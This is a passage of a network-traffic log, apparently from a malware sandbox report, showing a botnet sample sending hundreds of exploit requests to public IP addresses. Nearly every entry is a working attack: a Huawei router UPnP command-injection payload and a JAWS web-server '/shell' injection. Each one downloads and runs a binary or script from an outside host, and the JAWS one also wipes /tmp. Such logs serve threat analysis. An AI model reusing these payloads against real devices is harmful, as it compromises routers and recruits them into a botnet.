                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            348192.168.2.1342026197.128.86.6337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.273128033 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            349192.168.2.1359706156.154.82.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.274013996 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            350192.168.2.133467841.14.173.13937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.274772882 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            351192.168.2.133583475.46.147.18080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.083313942 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            352192.168.2.1345866181.113.46.12580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.083878994 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            353192.168.2.13437008.145.15.14780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.084445953 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            354192.168.2.135891267.115.43.21980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.084990978 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            355192.168.2.1350556158.99.97.25480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.085778952 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            356192.168.2.133503664.180.193.880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.086431026 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            357192.168.2.1338432112.146.51.25580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.087126017 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            358192.168.2.134668462.168.165.13680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.087778091 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            359192.168.2.1342532181.95.234.1780
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.088584900 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            360192.168.2.134024851.171.172.21280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.089267969 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            361192.168.2.135517875.148.35.480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.091217041 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            362192.168.2.133808294.87.180.15380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.092323065 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            363192.168.2.1347666132.254.47.15980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.093025923 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            364192.168.2.1348928205.225.173.19680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.093772888 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            365192.168.2.1341156116.139.9.4280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.094681978 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            366192.168.2.1357206205.141.193.12280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.095480919 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            367192.168.2.1335516118.208.232.7980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.096205950 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            368192.168.2.1344218217.26.244.6880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.096951008 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            369192.168.2.1333038211.223.163.14580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.097659111 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            370192.168.2.1346904169.8.129.21480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.098346949 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            371192.168.2.1343804130.145.155.18680
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.099009991 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            372192.168.2.1350944177.48.23.10980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.099888086 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            373192.168.2.1360212118.240.5.9980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.100541115 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            374192.168.2.13605949.187.220.24880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.101238966 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            375192.168.2.1344802105.130.18.4580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.101872921 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            376192.168.2.1341406147.119.198.2980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.102547884 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            377192.168.2.1354126153.123.46.18080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.103188992 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            378192.168.2.1338728223.124.210.13280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.103821993 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            379192.168.2.134440279.2.193.5080
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.104496002 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            380192.168.2.1352408138.243.195.10980
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.106416941 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            381192.168.2.134963437.113.221.6580
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.107053041 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            382192.168.2.133873631.59.193.25380
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.107738018 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            383192.168.2.1358042120.80.140.21480
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.108387947 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            384192.168.2.1360560125.86.204.15880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.109019041 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            385192.168.2.135396672.31.149.5180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.109647036 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            386192.168.2.1337622207.225.19.4880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.110349894 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            387192.168.2.134995219.78.165.7880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.111021042 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            388192.168.2.1336160123.231.38.19280
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.111653090 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            389192.168.2.1360740175.194.108.22180
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.112260103 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
                            Host: 127.0.0.1:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive


                            Session IDSource IPSource PortDestination IPDestination Port
                            390192.168.2.1352482172.81.228.24880
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.112951040 CEST243OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.71.59/jaws;sh+/tmp/jaws HTTP/1.1
                            User-Agent: Hello, world
